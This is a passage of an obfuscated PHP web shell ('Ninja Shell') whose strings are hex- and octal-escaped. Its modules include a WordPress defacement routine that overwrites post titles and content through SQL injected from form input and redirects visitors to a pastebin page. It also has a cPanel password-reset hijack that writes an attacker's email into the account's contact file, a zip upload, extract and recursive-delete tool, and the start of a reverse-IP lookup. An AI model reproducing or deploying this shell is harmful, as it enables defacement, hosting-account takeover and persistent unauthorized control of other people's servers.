0\x20\x20\40\x3c\144\151\x76\x20\x63\x6c\x61\x73\x73\40\75\40\x27\x63\x6f\154\55\x6d\x64\x2d\64\47\x3e\12\40\x20\40\40\x20\40\40\x20\x20\x20\40\40\74\x75\x3e\x42\165\164\164\x6f\x6e\x3a\x3c\57\165\76\xa\40\40\x20\40\x20\40\x20\x20\40\x20\40\x20\74\x69\156\160\x75\164\40\143\154\141\x73\163\x20\x3d\x27\x66\157\x72\155\55\x63\x6f\156\164\162\157\154\47\x20\163\164\171\x6c\145\40\75\40\x27\167\x69\144\x74\150\72\62\65\60\160\x78\x3b\150\x65\151\147\150\x74\72\64\60\160\170\73\47\40\164\171\160\145\x3d\x27\163\165\x62\155\x69\164\47\x20\156\141\155\145\x3d\x27\x63\162\x65\141\164\145\x27\x20\166\141\x6c\165\145\x3d\x27\x47\x61\x73\x73\47\76\xa\40\x20\x20\40\40\40\40\x20\x20\x20\40\x20\74\x2f\x64\x69\166\76\xa\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\40\x3c\57\x64\151\x76\76\xa\x20\x20\40\x20\x20\40\40\40\x20\40\40\x20\74\x2f\146\157\x72\155\76\x3c\x62\x72\76\xa\40\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\55\x2d\x20\117\160\164\x69\157\156\40\x2d\x2d\74\x62\162\76\12\40\40\x20\x20\40\40\40\x20\40\x20\40\x20\x3c\x66\157\162\x6d\x20\x6d\145\x74\150\157\x64\x3d\47\160\157\163\x74\x27\x3e\xa\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\40\x3c\144\x69\166\x20\143\154\x61\x73\163\x20\x3d\40\47\162\x6f\x77\40\x63\x6c\x65\x61\x72\x66\x69\170\47\76\xa\40\40\x20\x20\x20\40\40\40\x20\x20\x20\40\74\x64\151\166\x20\x63\x6c\x61\x73\163\x20\x3d\40\x27\143\157\154\55\x6d\x64\x2d\x34\47\76\xa\x20\40\x20\x20\40\40\40\x20\x20\40\40\x20\74\x69\x6e\x70\x75\164\x20\143\154\x61\x73\163\x20\x3d\47\x66\x6f\x72\155\55\x63\157\x6e\x74\x72\157\x6c\47\x20\163\x74\x79\x6c\145\40\75\40\x27\x77\x69\144\x74\x68\72\x32\x35\60\160\170\x3b\150\145\151\x67\150\x74\x3a\x34\60\160\170\73\47\40\164\171\160\145\75\47\x74\145\170\164\x27\x20\x6e\141\x6d\x65\x3d\x27\162\137\165\x73\x65\x72\47\x20\160\x6c\141\143\x65\150\x6f\x6c\144\145\162\x3d\x27\165\x73\x65\162\156\x61\155\145\x27\40\162\145\161\165\151\x72\x65\144\x3e\12\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\x20\74\57\x64\151\x76\76\12\x20\x20\40\40\40\x20\x20\40\x20\40\x20\x20\x3c\x64\151\166\40\x63\x6c\x61\163\163\40\x3d\40\47\143\x6f\154\x2d\155\x64\x2d\x34\x27\x3e\xa\40\40\40\x20\40\40\x20\40\x20\40\40\40\x3c\x73\145\x6c\145\143\x74\x20\156\141\x6d\x65\x3d\47\x6f\x70\163\151\47\40\143\x6c\x61\163\163\40\75\47\x66\157\162\155\55\x63\157\x6e\164\x72\157\154\x27\40\x73\164\x79\154\x65\x20\x3d\x20\x27\167\x69\144\x74\x68\72\x32\65\x30\x70\x78\73\150\x65\x69\x67\x68\x74\x3a\64\x30\x70\x78\x3b\x27\x3e\12\40\40\40\x20\40\40\x20\40\40\x20\40\40\x3c\x6f\x70\164\151\157\x6e\40\166\x61\154\x75\x65\x3d\x27\x31\47\76\103\x65\153\x20\125\163\x65\162\156\141\155\145\74\x2f\x6f\x70\x74\151\x6f\156\x3e\12\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\74\x6f\160\164\151\x6f\156\x20\x76\141\154\165\x65\x3d\47\62\47\76\125\x62\x61\150\x20\120\141\x73\163\x77\x6f\x72\144\74\57\x6f\160\x74\151\x6f\156\76\xa\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x3c\x6f\x70\164\151\157\x6e\40\166\x61\x6c\x75\x65\75\x27\63\x27\x3e\x48\141\x70\x75\163\40\x55\163\x65\162\x6e\x61\155\145\74\57\x6f\x70\164\x69\x6f\x6e\x3e\12\x20\40\40\40\40\40\40\x20\40\40\x20\40\74\x2f\x73\x65\154\x65\143\x74\x3e\xa\x20\x20\40\x20\40\x20\40\40\x20\40\x20\x20\74\x2f\x64\151\x76\76\12\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\x20\x3c\144\151\x76\40\x63\154\141\163\x73\40\x3d\40\47\143\157\x6c\55\x6d\x64\55\x34\47\x3e\12\40\x20\40\40\x20\40\x20\40\x20\x20\40\x20\74\151\156\x70\x75\164\x20\x74\171\160\x65\x3d\47\163\165\x62\x6d\151\x74\x27\x20\156\x61\155\145\75\x27\x73\x5f\157\x70\x73\151\47\x20\166\x61\154\165\145\x3d\47\103\145\x6b\x27\40\143\154\x61\x73\163\x20\75\x27\x66\x6f\162\155\55\x63\x6f\156\x74\162\x6f\154\x27\40\x73\x74\x79\x6c\145\x20\x3d\40\47\x77\x69\144\164\x68\x3a\62\65\x30\160\x78\73\150\x65\x69\147\x68\164\72\64\x30\x70\170\73\x27\76\xa\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\x3c\57\144\x69\x76\x3e\12\40\x20\40\x20\40\x20\40\40\x20\40\x20\40\74\57\144\x69\166\x3e\xa\40\40\x20\40\40\x20\x20\x20\40\40\x20\40\x3c\57\146\157\162\155\x3e\x3c\x68\x72\x3e\74\142\x72\x3e\12\x20\40\40\x20\40\x20\x20\40\x20\40\x20\x20"; } } else { echo "\74\x66\x6f\x6e\164\x20\143\157\x6c\157\162\x3d\x72\x65\x64\76\106\151\x74\x75\162\x20\151\x6e\151\40\x68\x61\156\171\x61\40\x64\x61\x70\x61\x74\x20\144\x69\147\x75\156\x61\153\141\156\40\x64\x61\154\141\x6d\40\127\x69\156\144\x6f\x77\163\x20\123\145\162\x76\145\x72\56\x3c\57\x66\x6f\156\164\x3e"; } } elseif (isset($_GET[hex("\x77\x70\55\x68\x69\x6a\x61\x63\x6b")])) { echo "\x3c\x66\x6f\x72\x6d\x20\155\145\164\x68\x6f\144\x3d\x22\120\117\123\124\42\x3e\12\x3c\143\145\x6e\x74\x65\162\76\74\150\x72\76\74\142\x72\76\11\x9\11\12\x3c\151\155\x67\40\x62\157\x72\144\145\x72\75\x22\x30\42\40\163\162\x63\75\42\x68\164\164\x70\x3a\x2f\x2f\x77\x77\167\63\x2e\x30\x7a\172\x30\x2e\x63\157\155\57\x32\60\61\x34\x2f\60\70\x2f\x32\60\57\x31\65\x2f\x36\x31\65\65\x30\x36\63\x35\x38\56\160\156\x67\42\76\12\74\x68\x32\x3e\127\x6f\162\144\x70\x72\x65\163\163\40\x48\151\x6a\x61\143\153\x20\111\x6e\144\x65\x78\x20\116\x69\x6e\152\x61\x20\123\150\x65\x6c\x6c\x3c\x2f\x68\x32\76\74\x62\x72\x3e\12\74\143\x65\x6e\x74\145\162\x3e\12\x3c\144\x69\166\x20\x63\154\x61\163\x73\40\x3d\x20\x22\x72\157\167\40\x63\154\145\141\162\146\151\x78\x20\155\154\55\x35\x22\x3e\xa\x3c\x64\151\166\x20\143\x6c\141\163\163\75\x20\42\x63\157\x6c\55\155\x64\55\62\42\76\12\74\x69\x6e\x70\x75\164\40\x63\154\141\x73\x73\75\42\x66\157\162\155\55\143\x6f\x6e\164\x72\x6f\x6c\42\40\164\171\x70\x65\x3d\42\164\x65\x78\x74\x22\40\x76\x61\x6c\165\x65\75\x22\154\x6f\143\x61\154\150\x6f\x73\164\42\40\x6e\141\x6d\145\x3d\42\160\x67\150\157\x73\x74\x22\x3e\xa\74\x2f\x64\151\166\x3e\xa\x3c\x64\151\x76\40\x63\x6c\141\163\x73\x3d\x20\42\143\x6f\x6c\x2d\155\144\x2d\62\x22\76\xa\x3c\151\156\160\x75\164\40\143\154\141\163\163\75\42\146\x6f\162\155\x2d\143\x6f\x6e\164\x72\x6f\x6c\42\40\x74\x79\x70\145\75\42\164\x65\170\x74\42\40\166\141\154\165\x65\75\42\144\141\x74\x61\x62\141\x73\145\137\156\x61\155\145\42\40\x6e\141\155\145\75\x22\144\142\x6e\x6d\156\42\76\xa\74\x2f\x64\151\166\x3e\xa\74\x64\151\166\x20\x63\154\141\x73\x73\x3d\x20\42\143\x6f\x6c\55\x6d\x64\x2d\62\x22\76\xa\x3c\x69\x6e\x70\165\x74\x20\x63\154\x61\x73\x73\75\42\146\157\x72\x6d\55\143\157\156\x74\162\x6f\154\42\x20\164\171\x70\x65\75\42\164\x65\170\x74\x22\40\x76\141\x6c\165\145\x3d\x22\160\x72\x65\146\151\170\x22\40\x6e\x61\155\145\x3d\42\x70\162\145\x66\151\170\42\x3e\12\74\x2f\144\x69\x76\x3e\xa\x3c\144\151\x76\x20\x63\154\x61\x73\x73\x3d\x20\42\x63\157\154\55\x6d\x64\x2d\x32\42\76\12\x3c\x69\156\160\165\x74\x20\143\154\x61\x73\x73\75\42\146\x6f\x72\155\55\143\x6f\x6e\x74\x72\x6f\154\x22\40\164\x79\160\145\x3d\42\164\145\x78\x74\42\40\166\141\x6c\x75\145\75\42\x75\163\x65\162\x6e\141\155\145\x5f\144\142\x22\40\156\x61\155\145\x3d\x22\x64\x62\x75\163\x72\162\162\x72\42\x3e\12\x3c\57\144\151\166\76\xa\74\144\151\166\x20\143\x6c\x61\x73\x73\75\40\x22\x63\x6f\x6c\55\x6d\x64\x2d\62\42\76\xa\74\x69\x6e\160\165\164\40\x63\x6c\x61\163\163\x3d\x22\146\x6f\162\x6d\55\143\x6f\x6e\164\162\157\154\x22\x20\164\171\x70\x65\75\x22\x74\x65\170\164\42\40\x76\141\154\x75\x65\75\x22\x70\141\x73\163\167\x6f\162\x64\x5f\x64\x62\42\40\x6e\141\x6d\145\75\x22\x70\x77\144\144\x62\142\x6e\42\x3e\x3c\57\x63\145\156\x74\x65\162\76\74\x62\162\76\xa\74\x2f\144\x69\166\76\xa\x3c\57\144\x69\x76\x3e\xa\74\x63\145\x6e\164\x65\162\76\74\164\145\x78\164\141\x72\145\141\40\x63\x6c\x61\163\x73\75\x22\x66\157\162\155\55\x63\x6f\x6e\x74\162\157\154\42\40\156\141\x6d\145\75\42\160\157\167\156\42\40\143\157\154\163\75\42\70\65\42\x20\162\157\167\x73\x3d\42\61\x30\x22\x3e\x3c\155\145\x74\141\40\x68\x74\164\x70\x2d\145\161\x75\x69\166\75\x22\162\145\x66\x72\x65\163\x68\42\x20\143\157\x6e\164\x65\156\164\75\42\x30\x3b\x55\x52\114\x3d\150\x74\164\x70\72\57\x2f\160\141\x73\164\x65\142\x69\156\56\143\x6f\155\57\162\x61\x77\56\x70\150\x70\x3f\x69\x3d\127\x47\x31\x7a\101\x53\115\107\x22\76\74\x2f\164\x65\x78\x74\x61\x72\145\141\76\74\x62\162\76\12\x3c\151\156\x70\x75\x74\40\x73\x74\x79\x6c\x65\x3d\42\x77\151\144\164\150\x3a\62\65\60\160\x78\73\150\145\151\x67\150\164\x3a\64\60\x70\170\x3b\42\40\143\154\x61\163\x73\x3d\x22\x66\157\x72\x6d\55\x63\157\156\x74\162\157\154\42\x20\x74\x79\x70\x65\75\x22\163\x75\x62\x6d\x69\x74\x22\x20\156\x61\x6d\145\75\42\x75\160\62\42\x20\x76\x61\x6c\165\x65\75\x22\110\151\x6a\141\143\x6b\40\x49\x6e\144\x65\170\42\x3e\74\x62\162\x3e\74\57\143\145\x6e\x74\x65\162\76\74\146\x6f\162\x6d\x3e\74\150\x72\x3e\x3c\142\162\x3e"; $pghost = $_POST["\x70\147\150\x6f\x73\164"]; $dbnmn = $_POST["\144\142\x6e\155\x6e"]; $dbusrrrr = $_POST["\x64\142\x75\x73\x72\162\162\162"]; $pwddbbn = $_POST["\x70\167\144\x64\x62\142\x6e"]; $index = stripslashes($_POST["\x70\157\x77\156"]); $prefix = $_POST["\160\162\x65\146\151\x78"]; if ($_POST["\165\x70\x32"]) { @mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error()); @mysql_select_db($dbnmn) or die(mysql_error()); $tableName = $prefix . "\x70\157\x73\x74\163"; $ghost1 = mysql_query("\125\120\x44\101\x54\x45\x20{$tableName}\x20\x53\105\124\40\160\x6f\x73\x74\137\164\151\x74\x6c\145\x20\75\x27" . $index . "\x27\x20\x57\x48\105\x52\105\40\111\104\x20\x3e\x20\x30\40"); if (!$ghost1) { $ghost2 = mysql_query("\125\120\104\x41\x54\x45\x20{$tableName}\40\123\105\124\x20\160\x6f\163\164\137\x63\157\156\x74\145\156\x74\x20\x3d\x27" . $index . "\x27\40\127\x48\105\x52\x45\40\111\104\40\x3e\40\60\40"); } elseif (!$ghost2) { $ghost3 = mysql_query("\x55\x50\104\x41\124\105\40{$tableName}\x20\123\x45\124\x20\x70\x6f\x73\164\x5f\x6e\141\x6d\145\40\75\x27" . $index . "\x27\x20\x57\x48\105\122\x45\x20\x49\x44\x20\x3e\40\x30\40"); } mysql_close(); if ($ghost1 || $ghost2 || $ghost3) { echo "\74\143\145\156\x74\145\162\76\x3c\x70\76\74\142\76\74\146\x6f\156\164\40\x63\x6f\154\157\x72\x3d\47\x72\x65\144\x27\76\111\156\144\145\x78\x20\127\x65\142\x73\x69\164\x65\40\110\x61\166\x65\x20\x62\x65\x65\156\x20\110\x69\152\x61\x63\x6b\145\144\x20\123\x75\x63\143\x65\x73\163\x66\165\x6c\154\x79\x3c\x2f\x66\x6f\156\164\x3e\x3c\x2f\160\76\74\x2f\142\76\x3c\x2f\x63\145\156\x74\x65\x72\x3e"; } else { echo "\74\143\145\x6e\x74\145\x72\76\x3c\x70\76\x3c\142\76\74\x66\x6f\x6e\x74\40\143\x6f\154\157\x72\75\47\162\x65\x64\47\x3e\x46\x61\x69\154\145\x64\40\x54\157\x20\x48\x69\152\141\x63\x6b\40\x74\150\x65\x20\x57\145\142\x73\x69\164\145\40\72\x28\74\57\146\x6f\x6e\164\76\x3c\x2f\160\76\x3c\57\x62\x3e\x3c\57\143\145\x6e\x74\145\162\x3e"; } } } elseif (isset($_GET[hex("\143\x70\141\156\x65\x6c\55\x72\x65\x73\x65\164")])) { echo "\xa\11\x9\74\150\162\76\74\142\162\x3e\12\40\x20\x20\40\40\40\x20\x20\40\74\x63\145\x6e\164\x65\162\76\xa\40\x20\40\40\x20\40\40\40\x20\x3c\x68\62\x3e\103\x70\141\156\x65\154\x20\x52\145\163\145\164\40\116\151\x6e\152\141\x20\x53\150\x65\154\154\74\57\x68\62\x3e\xa\40\x20\x20\40\x20\40\x20\40\40\x3c\142\x72\76\74\x62\x72\76\12\x20\40\x20\40\40\x20\40\x20\40\xa\40\40\11\xa\40\x20\x9\40\x20\40\x20\x3c\x66\x6f\x72\x6d\x20\x61\143\164\x69\x6f\156\75\x22\x22\x20\x6d\145\164\150\157\144\x3d\42\x70\x6f\x73\164\x22\76\xa\x20\x20\11\x20\x20\40\x20\x3c\x62\76\40\105\x6d\141\151\x6c\x20\x3a\x20\74\x2f\x62\x3e\12\x20\x20\11\74\x69\156\x70\165\164\40\164\x79\x70\x65\x3d\42\x65\x6d\141\151\154\42\x20\x6e\x61\x6d\x65\75\x22\x65\x6d\141\151\154\x22\40\x63\x6c\x61\163\163\40\75\x20\42\x66\x6f\x72\x6d\55\x63\157\156\x74\162\157\154\42\x20\163\164\x79\x6c\x65\40\x3d\40\42\167\x69\x64\x74\x68\72\x32\x35\60\160\x78\73\x20\150\x65\x69\x67\150\164\x3a\64\60\x70\x78\73\42\x20\141\x75\x74\157\x63\157\155\160\x6c\145\x74\x65\x3d\42\157\146\x66\42\x20\x20\x2f\76\xa\40\x20\x9\74\x62\x72\x3e\xa\x20\x20\11\x3c\151\x6e\160\x75\x74\x20\164\171\160\145\x3d\x22\163\x75\142\155\151\164\x22\40\156\x61\x6d\145\75\42\163\x75\142\x6d\x69\x74\42\40\x76\x61\x6c\x75\x65\75\x22\x52\x65\x73\145\164\40\x50\x61\x73\163\x77\157\162\144\x21\42\40\143\154\141\163\x73\40\x3d\40\x22\x66\157\x72\155\x2d\143\157\x6e\x74\162\x6f\x6c\42\40\163\x74\x79\154\x65\x20\75\x20\42\x77\x69\144\164\x68\x3a\x32\65\x30\x70\170\x3b\40\150\145\151\147\x68\x74\72\64\60\x70\170\73\42\40\x2f\76\xa\40\x20\11\x3c\57\146\157\162\155\x3e\xa\40\x20\x9\x3c\142\x72\76\xa\40\x20\11\x3c\x2f\144\x69\x76\76\12\40\x20\11\x20\x20\40\40\40\74\57\143\x65\156\164\145\x72\76\xa\40\x20\11\x20\x20\40\40\40\74\x68\x72\76\74\x62\x72\x3e\12\40\x20\40\40\x20"; $user = get_current_user(); $site = $_SERVER["\110\x54\124\120\137\110\x4f\123\124"]; $ips = getenv("\122\105\115\117\x54\105\x5f\101\104\104\x52"); if (isset($_POST["\x73\165\x62\155\x69\x74"])) { $email = $_POST["\145\155\x61\151\154"]; $wr = "\145\x6d\141\x69\x6c\72" . $email; $f = fopen("\57\x68\x6f\x6d\145\57" . $user . "\x2f\x2e\x63\160\x61\x6e\145\x6c\x2f\143\157\156\164\x61\143\164\151\156\x66\157", "\x77"); fwrite($f, $wr); fclose($f); $f = fopen("\57\150\x6f\x6d\145\57" . $user . "\57\56\143\157\x6e\164\x61\x63\164\x69\156\x66\x6f", "\x77"); fwrite($f, $wr); fclose($f); $parm = "\x44\x69\x73\x69\x6e\x69\x20\72\40" . $site . "\x3a\62\60\x38\63\x2f\x72\x65\163\x65\x74\160\141\163\x73\77\163\164\x61\x72\x74\x3d\61"; echo "\74\x62\162\57\x3e\74\143\x65\x6e\164\145\162\76" . $parm . "\74\x2f\x63\x65\x6e\x74\x65\x72\76"; } } elseif (isset($_GET[hex("\172\151\160\55\155\145\156\x75")])) { $dir = path(); echo "\x3c\143\145\x6e\x74\145\162\76"; echo "\x3c\x68\x72\76\x3c\x62\162\76"; echo "\x3c\x68\62\76\132\151\160\x20\115\x65\x6e\165\x3c\x2f\150\x32\76"; function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("\56" === $file || "\x2e\56" === $file) { continue; } if (is_dir("{$dir}\57{$file}")) { rmdir_recursive("{$dir}\x2f{$file}"); } else { unlink("{$dir}\57{$file}"); } } rmdir($dir); } if ($_FILES["\172\151\160\x5f\x66\151\154\145"]["\156\x61\x6d\145"]) { $filename = $_FILES["\172\x69\x70\137\x66\x69\x6c\x65"]["\x6e\141\155\145"]; $source = $_FILES["\x7a\x69\160\x5f\146\151\154\x65"]["\164\155\160\x5f\156\x61\155\145"]; $type = $_FILES["\172\x69\x70\137\x66\x69\x6c\145"]["\x74\171\160\145"]; $name = explode("\56", $filename); $accepted_types = array("\x61\x70\160\x6c\x69\x63\x61\164\x69\157\156\x2f\x7a\x69\160", "\141\160\160\x6c\151\143\141\x74\x69\157\156\57\x78\55\x7a\151\160\x2d\x63\x6f\x6d\x70\162\x65\163\163\x65\x64", "\x6d\x75\154\164\x69\x70\x61\162\x74\57\x78\x2d\172\151\160", "\x61\160\x70\x6c\151\143\x61\164\151\x6f\x6e\57\x78\55\143\157\x6d\160\162\x65\163\163\x65\144"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "\x7a\x69\x70" ? true : false; if (!$continue) { $message = "\x49\164\x75\x20\102\165\x6b\x61\x6e\x20\132\151\x70\40\x20\x2c\40\54\x20\107\117\102\x4c\117\113\x20\103\117\x4b"; } $path = dirname(__FILE__) . "\57"; $filenoext = basename($filename, "\56\172\151\x70"); $filenoext = basename($filenoext, "\x2e\x5a\111\120"); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } mkdir($targetdir, 511); if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "\x3c\142\x3e\123\165\153\x73\145\x73\40\103\x6f\153\40\x3a\51\x3c\x2f\142\76"; } else { $message = "\74\x62\x3e\x45\162\x72\157\162\40\112\x61\156\143\157\153\40\x3a\x28\x3c\x2f\x62\76"; } } echo "\74\x74\x61\x62\x6c\145\x20\163\164\171\154\145\x3d\42\x77\x69\144\164\150\x3a\x31\x30\60\45\42\40\142\x6f\x72\x64\x65\162\75\42\x31\42\76\xa\x3c\x66\157\162\x6d\x20\145\x6e\x63\164\x79\x70\x65\75\42\x6d\x75\154\x74\x69\160\141\x72\x74\57\x66\x6f\x72\x6d\55\x64\141\164\141\x22\x20\x6d\145\164\x68\157\x64\x3d\x22\160\157\x73\164\42\x20\141\143\164\x69\157\x6e\x3d\x22\42\76\xa\74\154\141\x62\x65\154\x3e\x5a\x69\x70\x20\106\151\x6c\x65\40\x3a\40\x3c\151\156\160\165\x74\40\164\171\160\145\x3d\42\x66\151\x6c\x65\42\40\143\x6c\141\163\163\x3d\x22\146\x6f\x72\155\x2d\143\x6f\x6e\164\162\x6f\x6c\42\40\x6e\141\x6d\145\75\42\x7a\151\160\x5f\x66\151\x6c\145\42\x20\57\x3e\x3c\x2f\154\x61\142\145\x6c\76\12\x3c\151\x6e\x70\x75\164\40\x74\171\x70\x65\75\x22\x73\x75\142\x6d\x69\x74\42\40\x63\x6c\141\163\x73\75\42\x66\157\x72\155\x2d\x63\157\x6e\164\x72\x6f\x6c\42\x20\x73\164\171\x6c\x65\75\x22\167\x69\144\x74\x68\x3a\62\x35\60\160\170\x3b\42\x20\156\x61\155\x65\x3d\x22\163\165\142\155\x69\x74\42\x20\166\x61\154\165\x65\x3d\42\x55\160\154\157\141\x64\40\101\156\x64\40\125\x6e\x7a\151\x70\x22\x20\x2f\76\12\74\57\x66\157\x72\155\x3e\x3c\142\x72\76\x3c\x62\x72\x3e"; if ($message) { echo "\74\160\x3e{$message}\x3c\57\x70\76"; } echo "\x3c\x68\x32\x3e\132\151\160\x20\102\x61\x63\153\x75\160\74\57\x68\x32\76\12\74\146\157\x72\155\40\141\143\x74\151\157\x6e\x3d\x27\x27\40\x6d\145\x74\150\157\x64\x3d\x27\x70\x6f\x73\x74\47\76\74\x66\157\x6e\164\x20\163\164\171\154\x65\x3d\x27\164\x65\x78\164\55\144\145\x63\157\162\x61\x74\151\x6f\x6e\x3a\40\165\x6e\144\x65\162\x6c\x69\156\x65\x3b\x27\76\x46\x6f\x6c\x64\x65\x72\72\x3c\x2f\x66\x6f\x6e\x74\76\x3c\x62\x72\76\12\74\151\x6e\x70\x75\164\x20\x63\154\x61\163\x73\75\47\x66\157\x72\155\x2d\143\x6f\156\x74\x72\x6f\154\x27\x20\x74\x79\x70\145\x3d\47\x74\x65\170\x74\x27\40\156\141\x6d\x65\x3d\x27\144\x69\x72\47\x20\x76\141\154\x75\145\x3d\x27{$dir}\x27\x20\163\x74\x79\x6c\145\x3d\47\x77\151\144\x74\150\72\40\64\x35\x30\x70\170\73\x27\40\150\x65\151\147\150\x74\75\47\x31\x30\x27\76\74\142\x72\76\74\x62\x72\76\xa\74\146\157\x6e\x74\40\x73\x74\x79\x6c\145\75\47\x74\x65\170\x74\55\x64\145\143\157\x72\x61\164\151\x6f\x6e\x3a\x20\x75\x6e\144\145\162\154\x69\156\x65\x3b\x27\76\x53\x61\166\x65\40\124\157\72\74\x2f\x66\x6f\x6e\164\76\x3c\x62\x72\76\xa\x3c\x69\x6e\160\x75\164\40\143\154\x61\163\x73\x3d\x27\146\x6f\162\155\x2d\x63\157\156\x74\x72\x6f\x6c\x27\x20\x74\x79\x70\x65\x3d\47\x74\145\170\164\x27\x20\156\x61\x6d\145\x3d\47\163\x61\x76\145\47\40\166\x61\x6c\165\145\x3d\x27{$dir}\x2f\x45\x78\x6f\162\143\151\x73\155\137\x62\141\x63\153\x75\160\56\x7a\151\160\x27\40\163\x74\171\x6c\145\75\47\x77\x69\144\x74\x68\x3a\x20\64\65\x30\160\x78\x3b\x27\x20\x68\145\x69\147\150\x74\x3d\47\x31\60\47\x3e\74\142\162\x3e\x3c\142\x72\76\xa\74\x69\156\x70\165\164\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x6f\x72\x6d\55\x63\x6f\x6e\x74\162\157\154\x27\x20\164\x79\160\145\x3d\x27\163\x75\x62\155\151\x74\x27\x20\x6e\141\x6d\145\75\x27\x62\x61\143\x6b\165\160\x27\40\x63\154\141\x73\163\x3d\47\153\157\x74\141\153\47\x20\x76\141\x6c\x75\x65\75\x27\102\141\x63\153\x20\125\160\x21\x27\x20\163\164\x79\154\x65\x3d\47\x77\151\144\x74\150\72\40\x32\61\65\160\170\x3b\47\76\x3c\57\x66\x6f\x72\x6d\x3e\x3c\142\x72\x3e\74\142\162\76"; if ($_POST["\x62\141\143\x6b\x75\160"]) { $save = $_POST["\x73\141\166\145"]; function Zip($source, $destination) { if (extension_loaded("\x7a\151\x70") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "\x2f", '', $file . "\x2f")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "\x2f", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["\144\x69\x72"], $save); echo "\123\145\154\x65\163\141\151\40\54\40\x53\141\166\x65\x20\124\157\x20\x3c\x62\76{$save}\74\57\x62\x3e"; } echo "\xa\x20\x20\x20\40\x20\x20\40\x20\x3c\x68\x32\x3e\x55\156\172\x69\160\x20\115\x61\156\165\x61\x6c\74\57\x68\62\76\12\40\40\x20\40\74\146\157\162\x6d\40\141\x63\164\x69\x6f\156\x3d\47\x27\40\155\x65\164\150\157\144\x3d\x27\160\157\x73\x74\x27\x3e\74\146\x6f\x6e\164\x20\163\164\x79\154\145\x3d\x27\x74\x65\x78\164\x2d\x64\145\143\x6f\x72\141\x74\151\x6f\156\72\x20\x75\156\144\145\x72\x6c\x69\156\x65\x3b\x27\76\132\x69\x70\x20\x4c\157\x63\x61\164\x69\x6f\x6e\x3a\74\57\x66\157\156\x74\x3e\x3c\x62\162\76\xa\x20\40\40\x20\x3c\151\156\x70\x75\164\40\143\154\x61\x73\163\75\x27\x66\157\162\x6d\x2d\x63\x6f\156\x74\162\x6f\x6c\x27\x20\x74\171\160\x65\75\x27\164\x65\170\164\47\40\x6e\x61\155\x65\75\x27\x64\151\162\x27\40\x76\141\x6c\x75\145\x3d\47{$dir}\x2f\146\x69\x6c\145\56\x7a\151\x70\47\40\x73\x74\x79\x6c\x65\75\x27\x77\x69\x64\x74\150\x3a\x20\x34\x35\60\x70\x78\73\47\x20\x68\x65\151\x67\x68\x74\x3d\47\x31\60\47\x3e\x3c\142\162\76\x3c\x62\162\76\xa\40\40\x20\x20\74\x66\x6f\x6e\164\40\163\164\x79\x6c\x65\75\47\164\145\170\x74\x2d\x64\x65\x63\157\x72\x61\x74\151\x6f\156\72\40\x75\x6e\144\x65\162\154\x69\156\x65\73\47\76\123\x61\x76\x65\x20\x54\x6f\x3a\74\57\146\x6f\156\x74\76\x3c\x62\162\76\12\40\40\40\x20\74\x69\x6e\160\x75\x74\40\x63\x6c\x61\x73\163\75\x27\x66\157\162\155\55\143\x6f\x6e\x74\162\157\154\47\40\x74\171\160\x65\x3d\x27\x74\145\x78\164\x27\x20\156\x61\155\145\75\x27\163\141\166\145\47\x20\x76\x61\154\165\x65\x3d\47{$dir}\57\105\x78\157\162\143\151\x73\x6d\x5f\x75\156\x7a\x69\x70\x27\x20\x73\164\x79\x6c\x65\x3d\47\x77\151\144\164\150\x3a\x20\x34\x35\x30\160\x78\73\x27\x20\x68\145\x69\147\150\x74\75\x27\61\x30\x27\x3e\74\x62\x72\x3e\x3c\x62\162\76\xa\x20\x20\40\40\74\151\x6e\160\165\164\x20\143\154\x61\x73\x73\x3d\47\146\157\162\x6d\x2d\x63\x6f\156\164\162\157\x6c\x27\40\x74\x79\160\145\75\47\163\165\142\155\151\164\x27\x20\x6e\x61\x6d\x65\75\x27\145\170\x74\x72\x61\153\47\x20\143\154\141\163\163\75\47\153\x6f\164\x61\x6b\x27\40\166\141\154\165\145\x3d\x27\125\x6e\172\151\x70\x21\x27\40\163\164\x79\154\x65\75\x27\x77\x69\144\x74\x68\72\x20\62\61\65\160\170\73\47\76\74\x2f\146\x6f\162\x6d\x3e\74\x62\x72\x3e\74\x62\162\x3e\xa\40\40\x20\x20"; if ($_POST["\x65\x78\164\x72\x61\x6b"]) { $save = $_POST["\x73\x61\x76\145"]; $zip = new ZipArchive(); $res = $zip->open($_POST["\x64\151\x72"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo "\x53\x75\x63\143\145\163\x20\54\x20\x4c\157\x63\x61\164\151\157\x6e\40\72\40\x3c\142\x3e" . $save . "\74\57\142\x3e"; } else { echo "\x47\x61\x67\141\154\40\103\157\153\40\x3a\x28\x20\116\164\x61\150\x6c\141\x68\x20\x21"; } } echo "\74\57\164\141\x62\154\x65\76\x3c\x68\162\76"; } elseif (isset($_GET[hex("\x72\145\x76\x65\162\163\145\55\x69\x70")])) { ?>
<br>
<hr>
<center>
<h2>Reverse IP Ninja Shell</h2>
